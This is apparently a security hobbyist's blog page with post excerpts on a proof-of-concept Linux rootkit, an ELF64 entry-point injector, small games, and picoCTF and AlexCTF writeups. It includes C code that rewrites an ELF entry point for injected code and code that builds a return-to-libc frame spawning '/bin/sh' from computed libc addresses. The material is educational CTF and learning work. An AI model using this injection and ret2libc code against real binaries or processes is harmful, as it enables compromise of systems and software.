I have always wanted to dive a bit deeper into how the Linux kernel internals work. To do this, I figured a good starting point would be to create a small proof-of-concept rootkit! You can find the code for the rootkit on GitHub: https://github.com/jordan9001/superhide.
I made a fun tool in order to learn a bit more about Linux ELF64 headers. It runs an exported function from a shared library before the original main function runs.
Right now it requires the target binary to already use dlopen and dlsym, so that those references can be reused. PIE binaries are also not supported. To lift both limitations, a future version would not depend on dlopen and dlsym at all, but would implement its own small pseudo-linker.
Either way, it was a great way to learn more about executables on Linux. I was inspired by the post on 0x00sec by pico (https://0x00sec.org/t/elfun-file-injector/410).
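As an added example (my code, not anything from the superhide or injector repositories), here is the kind of header check such an injector has to do before touching a binary: parse the ELF64 file header, refuse anything that is not a little-endian ELF64 image with an in-bounds program header table, report whether it is PIE (e_type == ET_DYN, the case the tool above does not support), and rewrite e_entry while keeping the old value so the hook can jump back to it. Rewriting e_entry is one common hook point for this class of injector, not necessarily how the author's tool does it. The struct mirrors Elf64_Ehdr from <elf.h> but is redeclared so the example builds without the system header; the in-memory image is constructed, not a real binary, and the e_entry rewrite assumes a little-endian host.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ELF64 file header, field for field the same as Elf64_Ehdr in <elf.h>,
 * redeclared here so the example builds without the system header. */
struct elf64_ehdr {
    uint8_t  e_ident[16];   /* magic, class, data encoding, version, ABI */
    uint16_t e_type;        /* ET_EXEC (2) or ET_DYN (3) for a loadable file */
    uint16_t e_machine;
    uint32_t e_version;
    uint64_t e_entry;       /* virtual address where execution starts */
    uint64_t e_phoff;       /* file offset of the program header table */
    uint64_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
};

enum { ET_EXEC_ = 2, ET_DYN_ = 3, ELFCLASS64_ = 2, ELFDATA2LSB_ = 1, PHDR64_SIZE = 56 };

struct elf_info {
    int      is_pie;        /* ET_DYN: loaded at a random base, e_entry is relative */
    uint64_t entry;
    uint64_t phoff;
    uint16_t phnum;
};

/* Validate the header and extract what an injector needs. Returns 0 on
 * success, -1 for anything that is not a well-formed little-endian ELF64
 * executable or shared object with an in-bounds program header table. */
int elf64_probe(const uint8_t *buf, size_t len, struct elf_info *out)
{
    struct elf64_ehdr hdr;
    if (len < sizeof hdr) return -1;
    memcpy(&hdr, buf, sizeof hdr);                          /* no unaligned reads */
    if (memcmp(hdr.e_ident, "\x7f" "ELF", 4) != 0) return -1;
    if (hdr.e_ident[4] != ELFCLASS64_) return -1;           /* EI_CLASS */
    if (hdr.e_ident[5] != ELFDATA2LSB_) return -1;          /* EI_DATA */
    if (hdr.e_type != ET_EXEC_ && hdr.e_type != ET_DYN_) return -1;
    if (hdr.e_phentsize != PHDR64_SIZE) return -1;
    if (hdr.e_phoff > len ||
        (uint64_t)hdr.e_phnum * PHDR64_SIZE > len - hdr.e_phoff) return -1;
    out->is_pie = (hdr.e_type == ET_DYN_);
    out->entry  = hdr.e_entry;
    out->phoff  = hdr.e_phoff;
    out->phnum  = hdr.e_phnum;
    return 0;
}

/* 1 if the image can be hooked (non-PIE), 0 if it is PIE, -1 if it is not
 * a usable ELF64 file at all. */
int injectable(const uint8_t *buf, size_t len)
{
    struct elf_info info;
    if (elf64_probe(buf, len, &info) != 0) return -1;
    return info.is_pie ? 0 : 1;
}

/* Point e_entry at the injected code and hand back the original entry so the
 * hook can jump to it afterwards. Refuses PIE images, matching the limitation
 * noted above. Assumes a little-endian host for the raw memcpy. */
int elf64_set_entry(uint8_t *buf, size_t len, uint64_t new_entry, uint64_t *old_entry)
{
    struct elf_info info;
    if (elf64_probe(buf, len, &info) != 0 || info.is_pie) return -1;
    *old_entry = info.entry;
    memcpy(buf + offsetof(struct elf64_ehdr, e_entry), &new_entry, sizeof new_entry);
    return 0;
}

/* Constructed test image: a header followed by one zeroed program header.
 * Not a real binary, just enough bytes to exercise the checks above. */
size_t make_image(uint8_t *buf, uint16_t type, uint64_t entry)
{
    struct elf64_ehdr hdr;
    memset(&hdr, 0, sizeof hdr);
    memcpy(hdr.e_ident, "\x7f" "ELF", 4);
    hdr.e_ident[4] = ELFCLASS64_; hdr.e_ident[5] = ELFDATA2LSB_; hdr.e_ident[6] = 1;
    hdr.e_type = type; hdr.e_machine = 62 /* EM_X86_64 */; hdr.e_version = 1;
    hdr.e_entry = entry; hdr.e_phoff = sizeof hdr; hdr.e_ehsize = sizeof hdr;
    hdr.e_phentsize = PHDR64_SIZE; hdr.e_phnum = 1; hdr.e_shentsize = 64;
    memcpy(buf, &hdr, sizeof hdr);
    memset(buf + sizeof hdr, 0, PHDR64_SIZE);
    return sizeof hdr + PHDR64_SIZE;
}

int main(void)
{
    uint8_t img[64 + PHDR64_SIZE];
    size_t n = make_image(img, ET_EXEC_, 0x401000);
    uint64_t old = 0;
    printf("injectable: %d\n", injectable(img, n));
    if (elf64_set_entry(img, n, 0x402000, &old) == 0)
        printf("entry moved from 0x%llx to 0x402000\n", (unsigned long long)old);
    return 0;
}
```

On a real file you would read the first 64 bytes plus the program header table into the buffer and run the same probe; a truncated file, a 32-bit image, or a PIE executable is rejected before any patching happens, which is the check you want in front of anything that rewrites headers.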
I made a small game for this month’s project. It isn’t much to look at.
It was fun getting more comfortable with Blender, and actually finishing a (very) small game. Hopefully more of this in the future!
Sorry the game is a bit tasteless. When I was in middle school, I played a flash game with a similar concept, and I thought it was the funniest idea in the world.
This past week my wife and I have been visiting my family in my home state, and my younger brothers and I took the opportunity to learn how to use Unity. We each made a small 3D game, which gave us a good feel for working with Unity. Continue reading: Starting with Unity
PicoCTF is a CTF “targeted at middle and high school students,” but I have always found them to be fun practice. This year (2017) especially, I thought the Binary Exploitation challenges were entertaining. This writeup will be about “Enter The Matrix,” in level 3.
The challenge description is:
This was a good challenge, involving a heap overflow and a return-to-libc attack. I implemented my exploit in Go, and you can see my source code at the bottom of this post.
If you are working on this problem, I will start with a few hints that don’t give everything away.
- Try playing with different non-symmetrical matrices.
- You can ssh into the machine that is running the challenge.
- The libc addresses gdb shows you will not be correct for the process running outside of gdb.
- On that machine you can use “readelf -s /lib32/libc.so.6” to get the offsets of any functions you need.
- free() is passed a pointer to data you control.
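The last three hints boil down to a bit of bookkeeping: take function offsets from readelf -s on the target's own 32-bit libc, combine them with where libc actually sits in the running process (not what gdb reports), and lay out a return-to-libc frame. The following is an added example of that bookkeeping in C; it is my code, not the writeup's Go exploit. The readelf excerpt and every address in it are constructed placeholders, not real glibc values, and how the heap overflow and the controlled free() pointer get you to this frame is specific to the challenge and not shown here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_SYMS 64
struct sym    { char name[64]; uint32_t value; };
struct symtab { struct sym syms[MAX_SYMS]; size_t n; };

/* Constructed readelf -s excerpt. The offsets are placeholders, not the real
 * values of any glibc build; run readelf against the target's own libc. */
static const char SAMPLE_READELF[] =
    "Symbol table '.dynsym' contains 5 entries:\n"
    "   Num:    Value  Size Type    Bind   Vis      Ndx Name\n"
    "     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND \n"
    "   201: 00000000     0 OBJECT  GLOBAL DEFAULT  UND _rtld_global@@GLIBC_PRIVATE\n"
    "   573: 0005f140   420 FUNC    WEAK   DEFAULT   13 puts@@GLIBC_2.0\n"
    "  1457: 0003a940    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0\n"
    "   143: 0002e7b0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0\n";

/* Parse the symbol rows of `readelf -s` output for a 32-bit libc. Header
 * lines, the null symbol and undefined (UND) imports are skipped; version
 * suffixes such as @@GLIBC_2.0 are stripped. Returns the number parsed. */
size_t parse_readelf_syms(const char *text, struct symtab *tab)
{
    const char *p = text;
    tab->n = 0;
    while (*p && tab->n < MAX_SYMS) {
        const char *nl = strchr(p, '\n');
        size_t linelen = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (linelen < sizeof line) {
            unsigned num, value, size;
            char type[16], bind[16], vis[16], ndx[16], name[64];
            memcpy(line, p, linelen);
            line[linelen] = '\0';
            if (sscanf(line, " %u: %x %u %15s %15s %15s %15s %63s",
                       &num, &value, &size, type, bind, vis, ndx, name) == 8
                && strcmp(ndx, "UND") != 0) {
                char *at = strchr(name, '@');
                if (at) *at = '\0';
                strcpy(tab->syms[tab->n].name, name);
                tab->syms[tab->n].value = value;
                tab->n++;
            }
        }
        if (!nl) break;
        p = nl + 1;
    }
    return tab->n;
}

/* Offset of a symbol inside libc (its Value column). 1 on success, 0 if absent. */
int sym_offset(const struct symtab *tab, const char *name, uint32_t *off)
{
    for (size_t i = 0; i < tab->n; i++)
        if (strcmp(tab->syms[i].name, name) == 0) { *off = tab->syms[i].value; return 1; }
    return 0;
}

/* libc base in the target = runtime address of any known symbol minus that
 * symbol's offset. The runtime address has to come from the target process
 * itself (a leak, or /proc/<pid>/maps with ASLR off), not from a gdb session. */
int libc_base(const struct symtab *tab, const char *known_sym, uint32_t known_addr, uint32_t *base)
{
    uint32_t off;
    if (!sym_offset(tab, known_sym, &off) || off > known_addr) return 0;
    *base = known_addr - off;
    return 1;
}

/* Runtime address of `name` given the base. */
int resolve(const struct symtab *tab, const char *name, uint32_t base, uint32_t *addr)
{
    uint32_t off;
    if (!sym_offset(tab, name, &off)) return 0;
    *addr = base + off;
    return 1;
}

/* Classic 32-bit return-to-libc frame: the hijacked return address becomes
 * system(), the next word is system()'s own return address (exit() avoids a
 * noisy crash afterwards), and the word after that is system()'s argument,
 * a pointer to "/bin/sh" inside the target. Writes 12 little-endian bytes. */
size_t build_ret2libc_frame(uint8_t *out, uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr)
{
    uint32_t words[3] = { system_addr, exit_addr, binsh_addr };
    for (int i = 0; i < 3; i++)
        for (int b = 0; b < 4; b++)
            out[i * 4 + b] = (uint8_t)(words[i] >> (8 * b));
    return 12;
}

int main(void)
{
    struct symtab tab;
    uint32_t base, sys, ex;
    uint8_t frame[12];
    parse_readelf_syms(SAMPLE_READELF, &tab);
    /* 0xf7e1f140 stands in for the address of puts observed in the target. */
    if (libc_base(&tab, "puts", 0xf7e1f140u, &base) &&
        resolve(&tab, "system", base, &sys) && resolve(&tab, "exit", base, &ex)) {
        build_ret2libc_frame(frame, sys, ex, 0xffffd000u);   /* "/bin/sh" address is a placeholder */
        printf("base=0x%08x system=0x%08x exit=0x%08x\n", base, sys, ex);
    }
    return 0;
}
```

The point of keeping the offsets and the base separate is exactly hint three: offsets from readelf are properties of the file and never change, while the base is a property of the running process, so anything measured inside gdb is only trustworthy for the part that does not depend on the environment.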
This year we got a group together to do AlexCTF. Almost all of the problems were fun, and overall I enjoyed the event.
Of the initial challenges released Friday, I had the most fun with the Reverse Engineering 3, Catalyst System challenge.
A quick aside about the two tools I used for this challenge: Radare2 and Z3. Radare2 is my favorite binary analysis and debugging tool. There is a bit of a learning curve, but it is powerful and open source! (Also, I love that no one knows how to pronounce Radare, so you get all sorts of fun interpretations.) If you are still using gdb, I highly recommend taking the time to get to know it. Z3 is a high-performance theorem prover (it does the math I can’t be bothered with). Continue reading: AlexCTF : Catalyst System WriteUp